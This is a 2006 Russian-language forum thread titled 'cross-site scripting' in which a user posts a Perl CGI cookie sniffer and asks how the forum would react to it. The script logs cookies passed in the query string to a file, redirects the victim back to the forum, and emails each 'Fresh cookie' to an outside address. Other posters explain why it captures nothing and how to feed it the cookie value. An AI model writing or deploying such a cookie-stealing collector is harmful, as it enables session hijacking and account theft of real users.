|
Название: cross-site scripting Отправлено: Yaruk7 от 06 04 2006, 00:17:49 а как наш форум реагирует на такое?
#!/usr/bin/perl use CGI qw(:standard); $cookie=$ENV{QUERY_STRING}; $file="cook.txt"; open (FILE, ">>$file"); print FILE "$cookie\n\n"; close(file); $query = CGI::new(); print $query->redirect('http://blackdeath.ru/forum/index.php'); $mailprog = '/usr/sbin/sendmail'; $mail='yaruk7@mail.ru'; $target='admin@blackdeath.ru'; open (MAIL, "|$mailprog -t"); print MAIL "Content-Type: text/plain\n"; print MAIL "Subject: Fresh cookie\n"; print MAIL "To: $mail\n"; print MAIL "From: '.$target.'\n\n"; print MAIL "$cookie"; close (MAIL); Название: cross-site scripting Отправлено: thunder от 07 04 2006, 10:58:07 никак :) создает пустой файл соок.тхт и редиректит на форум
Название: cross-site scripting Отправлено: Yaruk7 от 08 04 2006, 15:05:50 поидее редирект должен кидать пользователя на главную.. а вот почему он не заполняется куками я не наю :nesnayu:
Название: Re: cross-site scripting Отправлено: Я тебя искал от 30 10 2006, 04:10:17 а чего тут знать....
Чтобы этот снифер работал, нужно еще ему содержимое куков передавать как параметр... Найди меня, обсудим, если интересно. Название: Re: cross-site scripting Отправлено: Xantez от 30 10 2006, 13:06:44 Глаза поломал, пока читал )
Название: Re: cross-site scripting Отправлено: Adel Sagae от 30 10 2006, 19:52:50 Глаза поломал, пока читал ) А я ещ и мозги ;D
Powered by SMF 1.1.21 | energized by thunder
|